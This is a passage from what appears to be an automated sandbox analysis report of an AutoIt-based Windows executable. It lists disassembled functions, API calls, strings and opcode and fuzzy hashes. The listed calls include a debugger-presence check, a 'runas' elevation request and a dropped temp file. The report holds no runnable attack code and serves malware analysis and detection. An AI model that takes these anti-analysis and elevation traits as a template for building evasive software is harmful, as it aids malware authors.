                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID:
                            • API String ID: 48322524-0
                            • Opcode ID: 9fa978207105be615f7bb22271435fefabf0ea4b57fea8c4204d41eab7b9ee3c
                            • Instruction ID: ae3cc3312710b17223ec09a2cd38749ce128fcec75fd3b8e13e61205ce346bbe
                            • Opcode Fuzzy Hash: 9fa978207105be615f7bb22271435fefabf0ea4b57fea8c4204d41eab7b9ee3c
                            • Instruction Fuzzy Hash: 5AE09232814518AB8A10AB78FC0D8E97B9CDB06335F408746FE38D31D0DB709AB047D6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AAF170, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNELBASE(Function_0001F12E), ref: 00AAF175
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 0955db0b19c7fd61abe91b442be24fc60b88b8606528d41d09d138c4a0a624a1
                            • Instruction ID: 8718e8100bb75681df7555d86d7532b3f654ea97774ae3eaee24456531358865
                            • Opcode Fuzzy Hash: 0955db0b19c7fd61abe91b442be24fc60b88b8606528d41d09d138c4a0a624a1
                            • Instruction Fuzzy Hash: D4900264651101AE470817F0AD099456594AA596027914A786211CA494DF5440149615
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93C50, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-3360698832
                            • Opcode ID: 87addde649b9cf8c94c02b29522d8d94caaca7202f2e627b9cfac5f6f21b38ce
                            • Instruction ID: 07681800d1d4b179da633932f6656ff92491d7f7af02e0fed08f09584065eb6a
                            • Opcode Fuzzy Hash: 87addde649b9cf8c94c02b29522d8d94caaca7202f2e627b9cfac5f6f21b38ce
                            • Instruction Fuzzy Hash: 9261E672641B15A7EF20AB248D42FEF33AC9F55740F404065FC06AF283EB75EA45C6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A99430, Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Message$Peek$DispatchSleepTranslate
                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                            • API String ID: 1762048999-758534266
                            • Opcode ID: 4a7c440706712ca3bdfac470c7c01c2bd68a838bfa81f5f9c70984810899d873
                            • Instruction ID: aeab0b07a5932908555837ce577a5e4ab112afffb138ce48dd633d8f528f59d7
                            • Opcode Fuzzy Hash: 4a7c440706712ca3bdfac470c7c01c2bd68a838bfa81f5f9c70984810899d873
                            • Instruction Fuzzy Hash: 8E62F571608341AFDB24DF68C984BEBB7E8BF85304F14491DF55987252EB70E889CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9D7A0, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00A9D7BA
                              • Part of subcall function 00A92190: __wcsicoll.LIBCMT ref: 00A92262
                              • Part of subcall function 00A92190: __wcsicoll.LIBCMT ref: 00A92278
                              • Part of subcall function 00A92190: __wcsicoll.LIBCMT ref: 00A9228E
                              • Part of subcall function 00A92190: __wcsicoll.LIBCMT ref: 00A922A4
                              • Part of subcall function 00A92190: _wcscpy.LIBCMT ref: 00A922C4
                            • IsDebuggerPresent.KERNEL32 ref: 00A9D7C6
                            • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00000104,?,00B37F50,00B37F54), ref: 00A9D82D
                              • Part of subcall function 00A916A0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A916E5
                            • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 00A9D8A2
                            • MessageBoxA.USER32 ref: 00ABE14F
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00ABE1A3
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00ABE1D3
                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00ABE21D
                            • ShellExecuteW.SHELL32(00000000), ref: 00ABE224
                              • Part of subcall function 00AA03E0: GetSysColorBrush.USER32(0000000F), ref: 00AA03EB
                              • Part of subcall function 00AA03E0: LoadCursorW.USER32(00000000,00007F00), ref: 00AA03FA
                              • Part of subcall function 00AA03E0: LoadIconW.USER32(?,00000063), ref: 00AA0410
                              • Part of subcall function 00AA03E0: LoadIconW.USER32(?,000000A4), ref: 00AA0423
                              • Part of subcall function 00AA03E0: LoadIconW.USER32(?,000000A2), ref: 00AA0436
                              • Part of subcall function 00AA03E0: LoadImageW.USER32 ref: 00AA045E
                              • Part of subcall function 00AA03E0: RegisterClassExW.USER32 ref: 00AA04AD
                              • Part of subcall function 00AA0350: CreateWindowExW.USER32 ref: 00AA0385
                              • Part of subcall function 00AA0350: CreateWindowExW.USER32 ref: 00AA03AE
                              • Part of subcall function 00AA0350: ShowWindow.USER32(?,00000000), ref: 00AA03C4
                              • Part of subcall function 00AA0350: ShowWindow.USER32(?,00000000), ref: 00AA03CE
                              • Part of subcall function 00A9E2C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A9E3A7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: LoadWindow$Icon__wcsicoll$CurrentDirectoryName$CreateFullPathShow$BrushClassColorCursorDebuggerExecuteFileForegroundImageMessageModuleNotifyPresentRegisterShellShell__wcscpy
                            • String ID: AutoIt$C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                            • API String ID: 1688597619-2436220068
                            • Opcode ID: c3356380b1f36f6e112720967532020db8cfab87138cd7154ee2e40b2ed49b05
                            • Instruction ID: 7d49b74a4c950d5bc72f11d5813c5cdb8138c2fdc5418937a6c2e8cc34c9fe29
                            • Opcode Fuzzy Hash: c3356380b1f36f6e112720967532020db8cfab87138cd7154ee2e40b2ed49b05
                            • Instruction Fuzzy Hash: 4C411571B44244ABDF20EBA4ED46BED77F8AB48710FA041D4F64557292CFB449C8C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AECD0B, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                            Download Yara Rule
                            APIs
                            • _wcsncpy.LIBCMT ref: 00AECE26
                            • __wsplitpath.LIBCMT ref: 00AECE65
                            • _wcscat.LIBCMT ref: 00AECE78
                            • _wcscat.LIBCMT ref: 00AECE8B
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 00AECE9F
                            • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000104,?), ref: 00AECEB2
                              • Part of subcall function 00AC397D: GetFileAttributesW.KERNELBASE(?), ref: 00AC3984
                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000104,?), ref: 00AECEF2
                            • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 00AECF0A
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 00AECF1B
                            • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000104,?), ref: 00AECF2C
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 00AECF40
                            • _wcscpy.LIBCMT ref: 00AECF4E
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 00AECF91
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                            • String ID: *.*
                            • API String ID: 1153243558-438819550
                            • Opcode ID: d9bfa4f8ed5510eeabf7776f5845b76a01995b0b65c374858ce585e828cf7675
                            • Instruction ID: 0f6e84f2b16094f73735e4bd4d1caf07f9ef3ae76af8f2d68aa14ab239366ff4
                            • Opcode Fuzzy Hash: d9bfa4f8ed5510eeabf7776f5845b76a01995b0b65c374858ce585e828cf7675
                            • Instruction Fuzzy Hash: 7D71D472900288ABCF34EB55CCC5BEEBBB4AB45320F1485AAE409D7140D7759EC5CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E560, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00A9E5FF
                            • __wsplitpath.LIBCMT ref: 00A9E61C
                              • Part of subcall function 00AA392E: __wsplitpath_helper.LIBCMT ref: 00AA3970
                            • _wcsncat.LIBCMT ref: 00A9E633
                            • __wmakepath.LIBCMT ref: 00A9E64F
                              • Part of subcall function 00AA39BE: __wmakepath_s.LIBCMT ref: 00AA39D4
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1546
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1560
                              • Part of subcall function 00AA14F7: __CxxThrowException@8.LIBCMT ref: 00AA1571
                            • _wcscpy.LIBCMT ref: 00A9E687
                              • Part of subcall function 00A9E6C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,00A9E6A1), ref: 00A9E6DD
                            • _wcscat.LIBCMT ref: 00AB7324
                            • _wcslen.LIBCMT ref: 00AB7334
                            • _wcslen.LIBCMT ref: 00AB7345
                            • _wcscat.LIBCMT ref: 00AB735F
                            • _wcsncpy.LIBCMT ref: 00AB739F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                            • String ID: Include$\
                            • API String ID: 3173733714-3429789819
                            • Opcode ID: 11f5f706990dced5440b23f83c5b72de318bf4e8af4121953266cdbd28b43f0f
                            • Instruction ID: f1f4f2d5fc88934e830cd027c000e51b89424c809d9cf64b2ed19ba36d1ca3c4
                            • Opcode Fuzzy Hash: 11f5f706990dced5440b23f83c5b72de318bf4e8af4121953266cdbd28b43f0f
                            • Instruction Fuzzy Hash: B451C1B2804701ABC710EF69DD85CAF73E8FB8D300F50491DF599A32A1EBB19644CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA03E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                            Download Yara Rule
                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 00AA03EB
                            • LoadCursorW.USER32(00000000,00007F00), ref: 00AA03FA
                            • LoadIconW.USER32(?,00000063), ref: 00AA0410
                            • LoadIconW.USER32(?,000000A4), ref: 00AA0423
                            • LoadIconW.USER32(?,000000A2), ref: 00AA0436
                            • LoadImageW.USER32 ref: 00AA045E
                            • RegisterClassExW.USER32 ref: 00AA04AD
                              • Part of subcall function 00AA04E0: GetSysColorBrush.USER32(0000000F), ref: 00AA0513
                              • Part of subcall function 00AA04E0: RegisterClassExW.USER32 ref: 00AA053D
                              • Part of subcall function 00AA04E0: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA054E
                              • Part of subcall function 00AA04E0: InitCommonControlsEx.COMCTL32(00B390E8), ref: 00AA056B
                              • Part of subcall function 00AA04E0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA057B
                              • Part of subcall function 00AA04E0: LoadIconW.USER32(00A90000,000000A9), ref: 00AA0592
                              • Part of subcall function 00AA04E0: ImageList_ReplaceIcon.COMCTL32(00FE4038,000000FF,00000000), ref: 00AA05A2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
                            • Opcode ID: 332f2b01c2f4f95ec3e623c736e474ed2d25bedb1b5c9f27fe10d7925495813a
                            • Instruction ID: 310ee4ae86d2773fbcec8dcfa4319c7fd18024d7d2744b238caf213b4322cf5a
                            • Opcode Fuzzy Hash: 332f2b01c2f4f95ec3e623c736e474ed2d25bedb1b5c9f27fe10d7925495813a
                            • Instruction Fuzzy Hash: C52121B1D85314ABD720DF99EC85B9EBBB9FB4C700F10415AE504A7294DFB45500CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9A9D0, Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _malloc
                            • String ID: Default
                            • API String ID: 1579825452-753088835
                            • Opcode ID: 89635456c140488c7deb427976bd35c3d3374198295fe3bff371cf579c97f5a4
                            • Instruction ID: 706fd9897fbae8c5738646b8c48671386dcfcafefbc3dcf136a49b89a66f0114
                            • Opcode Fuzzy Hash: 89635456c140488c7deb427976bd35c3d3374198295fe3bff371cf579c97f5a4
                            • Instruction Fuzzy Hash: 99727DB0614301DFCB14DF28C585A6AB7F5AFA9310F24885EE8868B352D775EC45CBA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9FE90, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 126COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __fread_nolock_fseek_memmove_strcat
                            • String ID: AU3!$EA06
                            • API String ID: 1268643489-2658333250
                            • Opcode ID: 9b11b6ab3a7f64144dc969eb53850b661d32b64703f29e4d47059241d25e51f6
                            • Instruction ID: 81759568ccc760c9e3920b31441c384935644688eb901f6754df9a60c46946df
                            • Opcode Fuzzy Hash: 9b11b6ab3a7f64144dc969eb53850b661d32b64703f29e4d47059241d25e51f6
                            • Instruction Fuzzy Hash: 67412A72A041485FCF15DB68C881FFD3BB5AB0B304F6444B9F985D7143E67099818B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A91340, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129timewindowCOMMON
                            Download Yara Rule
                            APIs
                            • DefWindowProcW.USER32(?,?,?,?), ref: 00A91376
                            • KillTimer.USER32(?,00000001), ref: 00A913F9
                              • Part of subcall function 00A91240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A9129B
                            • PostQuitMessage.USER32(00000000), ref: 00A9140B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow
                            • String ID: TaskbarCreated
                            • API String ID: 3067442764-2362178303
                            • Opcode ID: 6c09a6a6418e65054aafb07c460b373ba5b96bffaeb1670fc22841e5185d1772
                            • Instruction ID: 72623444b2a83df09f41b2ff8c6241c7b16cf79850e391da43c7d90bbb8bdc09
                            • Opcode Fuzzy Hash: 6c09a6a6418e65054aafb07c460b373ba5b96bffaeb1670fc22841e5185d1772
                            • Instruction Fuzzy Hash: 4641FE7674820A9BDF20DB68EC86BEE33F9F754310F604526F9158B591CEB19C4087A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E700, Relevance: 10.7, APIs: 7, Instructions: 157COMMON
                            Download Yara Rule
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 00A9E72A
                              • Part of subcall function 00A92390: _wcslen.LIBCMT ref: 00A9239D
                              • Part of subcall function 00A92390: _memmove.LIBCMT ref: 00A923C3
                            • GetCurrentProcess.KERNEL32(?), ref: 00A9E7D4
                            • GetNativeSystemInfo.KERNELBASE(?), ref: 00A9E832
                            • FreeLibrary.KERNEL32(?), ref: 00A9E842
                            • FreeLibrary.KERNEL32(?), ref: 00A9E854
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                            • String ID:
                            • API String ID: 3363477735-0
                            • Opcode ID: 5e3dc935b09761214e7d9176a67239c55eb7be17a99cf623397a74055fe9dc4f
                            • Instruction ID: 4897a52df719e61aca72bc519695d180568a3c7a1246727af7f539df6ef8b285
                            • Opcode Fuzzy Hash: 5e3dc935b09761214e7d9176a67239c55eb7be17a99cf623397a74055fe9dc4f
                            • Instruction Fuzzy Hash: 7161AE70E08686EECB10DFA4C8846DCFFF4BF09304F14855AD444A7B42D3B9A998CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F3B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                            Download Yara Rule
                            APIs
                            • SHGetMalloc.SHELL32(00A9F1FC), ref: 00A9F3BD
                            • SHGetDesktopFolder.SHELL32(?,00B390E8), ref: 00A9F3D2
                            • _wcsncpy.LIBCMT ref: 00A9F3ED
                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00A9F427
                            • _wcsncpy.LIBCMT ref: 00A9F440
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                            • String ID: C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg
                            • API String ID: 3170942423-1666458635
                            • Opcode ID: ed5a2ce19e9bbbcbf314c3c34b5d4fc9df0620a2ca6c80bd9f2d363e6cffdbb8
                            • Instruction ID: c3b9516bbb24e7445d79eb64941385bc7a7898a6e1356ab107826b99386610d3
                            • Opcode Fuzzy Hash: ed5a2ce19e9bbbcbf314c3c34b5d4fc9df0620a2ca6c80bd9f2d363e6cffdbb8
                            • Instruction Fuzzy Hash: 72215175A00619ABDB14DBA4DC84DEFB37DEF88700F108698F905D7250EA30AE559BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A91490, Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00A91E00: _wcsncpy.LIBCMT ref: 00A91ED2
                              • Part of subcall function 00A91E00: _wcscpy.LIBCMT ref: 00A91EF1
                              • Part of subcall function 00A91E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A91F03
                            • KillTimer.USER32(?,?,?,?,?), ref: 00A91513
                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 00A91522
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00AB7BC8
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00AB7C1C
                            • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00AB7C67
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                            • String ID:
                            • API String ID: 3300667738-0
                            • Opcode ID: 5e0512415053a1b83bc9b8c849ae39326c296ef846e13f89db9dbfc7b9b3e459
                            • Instruction ID: dcb954038c1153225f11985134b7e6a9dc9214a3fa6be92469e14214538bd6d9
                            • Opcode Fuzzy Hash: 5e0512415053a1b83bc9b8c849ae39326c296ef846e13f89db9dbfc7b9b3e459
                            • Instruction Fuzzy Hash: 37316370608659BFEF26DB24CC95BEAFBBDBB46304F004185E18E97241CB705A958F91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E6C0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                            Download Yara Rule
                            APIs
